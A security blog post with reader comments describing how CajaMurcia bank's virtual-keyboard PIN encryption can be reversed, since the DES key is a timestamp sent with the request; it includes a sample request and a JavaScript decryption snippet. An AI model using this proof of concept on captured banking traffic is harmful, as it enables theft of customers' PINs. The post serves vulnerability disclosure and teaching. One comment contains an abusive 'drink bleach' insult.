Defeating Image-Based Virtual Keyboards and Phishing Banks

recently, i stumbled upon http://www.hispasec.com/laboratorio/cajamurcia_en.htm which nicely showed how a trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user’s pin, fairly easily, and wondered why are they taking this approach when the pins can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are “encrypted”.

image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these trojan horses. the bad guys adapted to this technology and escalated. now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed.

instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the pin in cleartext, while others encrypt them, one such example is cajamurcia. even when the encryption is used, banks tend to implement it badly making it easy to recover the pin from the encrypted form.

i investigated a bit more on how cajamurcia handles such pin strokes (with virtual keyboards) and i noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you – this already posses a security problem – and this timestamp is then used to encrypt the pin you entered.

this would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). anyhow, as it is sent back to the server, we have everything we need to decrypt the data (pin).

poc:

a request to the server would look like:

operacion=0002& caja=2043& camino=2043& pgdesti=corp& broker=si& vrs=001& pan=2043123456& sello=1610061555560000012569& cl=1161006956& pinv3=si& pana=2043& panb=123456& pin=bbcb6e341c56c6b2& idioma=01

we are only interested in pin=bbcb6e341c56c6b2 and cl=1161006956, cl being the timestamp and pin being the encrypted form of the pin number. if we feed these into the following js code:

https://intelvia.cajamurcia.es/2043/01/scripts/mod.js
function hextostring (h) {
var r = "";
for (var i= (h.substr(0, 2)=="0x")?2:0; i lowerthan h.length; i+=2) {
r += string.fromcharcode (parseint (h.substr (i, 2), 16));
}
return r;
}
calcula = '1161006956';
ciphertext = hextostring('0xbbcb6e341c56c6b2');
var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, "00000000");
console.debug(cleartext);

we will get our original pin. this isn’t necessarily easier as it requires data capture, which isn’t always easy, but screen captures usually require either an ocr, or manual labor, which the above code does not.

one needs to remember that javascript (or any client-side code and information) is indeed on the client’s side and under the client’s control. an attacker can kick it aside, or learn to emulate it and attack it – manipulate it. client-side encryption where the code and key are visible is pointless. no matter how much obfuscation or cross-frame and cross-file scripting is used, calling for different functions and parameters, nor how many functions you obfuscate your code through, it can be read and manipulated.

we made several email and phone attempts over the past couple of months to reach cajamurcia and report this security issue to them. Sun Shine even asked a couple of folks in spain to help with contacting them by phone, even speaking directly to security folks there. we were unsuccessful.

the bank is already under attack by the over-kill screenshot trojan horses. we release this information in full disclosure in the hope many online commerce sites using similar techniques or even sending the information in the clear will fix their implementations of the virtual keyboard click-me number-images schemes. these are broken by the use of the trojan horses we discussed, but that’s a whole other story.

noam rathaus

Share
  • sxpert

    my bank ( videoposte.com ) does something similarly stupid. I sent them a lengthy email, got a snail mail response saying “all is fine, this is for your own good, thanks for asking”…

  • blerg

    i tried to report some xss to another bank and could never get through their tech support engineers.
    It’s unbelievable that these people will implement a technology that may help them fight phishing only to introduce their own vulnerabilities.

  • PINN

    PIN already contains the word number. When you say PIN number you just look like a jackass.
    Please don’t take my personal identification number number!

  • Spoilt

    PINN: Being a spelling and grammar nazi makes you look like a jackass. Using “PIN number” simply looks like an editing mistake.

    Institutions really need some kind of security ombudsman to work as a go-between with the public and the internal security team. I’ve never heard of a company responding in a useful way to user’s (legitimate) security complaints.

    We’ve passed an age where security is no longer something done in the shadows between governments and institutions, its in the hands of every day people and needs to be addressed as much.

    However, banks are a business. If they were really loosing that much money, they’d make changes.

  • Andor

    Bad, bad, bad…

    It’s a pity…

    If you need contact with somebody here on spain, drop me a line :P

  • Andrew Anderson

    Using “PIN number” looks like sloppy thinking. Ironic, as the point of the article is that banks aren’t paying attention to details either!

  • xm

    When you report sec. issues in my country, they say it is impossible and even tell you why they’re “secure” and will also probably give you the name of the vendors they use, you don’t even need to do OS fingerprinting, they trust vendors not people.

    Security is a joke.

  • Greg Burns

    To conclude this idiotic argument people should read:
    http://www.wsu.edu/~brians/errors/pin.html

  • Reece

    Everyone here does realize banks do not have a “tech support” that actually builds their websites right? They hire consulting firms to do that, which in turn don’t care about security because it’s not their website. As long as it’s functional and meets the client’s specifications, they are in the clear.

    Banks and other organizations need to learn how to include security specifications along with the rest of their specifications when hiring consulting firms.

  • Mentil

    Perhaps the banks’ insurers would be interested in their website security flaws…

  • Jon

    the reason terms like “PIN Number” or “ATM Machine” are used, is because people hear “PIN” but they don’t know that “PIN” means “Personal Identification Number”, because they haven’t been taught the link between PIN and Personal Identification Number. if you don’t break stuff down for the uninitiated, then you alienate them, and we can’t alienate anybody.
    heaven forbid they learn something… they might grow up to become PRESIDENT!!! :O

  • http://www.psis.co.nz Dave

    @Reece, you are only partially correct. I work for a small kiwi banking organisation and yes we engaged a consulting firm to help build our first website. Once the dust had settled though, the ongoing development and support is on us. We take security very seriously and have recently implemented an RSA token based two factor authentication scheme. All our work must pass an external security audit prior to going live. Obviously there are banks who do not adequately protect their online banking applications but I don’t believe we are unique in how seriously we take our online security.

  • http://vasco.com/ Barry Staes

    My dutch bank (RaboBank) has something like this: http://vasco.com/

    If i want to utilize online banking, i have to use a small calculator-like device. I have to insert my banking card, enter my pin code, and to complement that some random code the website hands me.
    Then the device gives me a code to hand to the website.

    The bank doesn’t rely on computer safety. Looks like a quite secure endpoint to me.

  • Todd

    You’re all complete idiots. Quit arguing grammar, spelling, punctuation, and go back to trolling on Slashdot.

    Somebody’s trying to teach you something here and all you’re doing is wasting time saying “OMFGS U DIDNT RAELLY SAY PIN NUMBER DID YOU?!?#@ YOUS MOROON, PERSONAL IDENTIFICATION NUMBER NUMBER, LOL!”.

    Go drink a gallon of bleach already.

  • http://none Redvox

    Interesting idea. Thanks for sharing.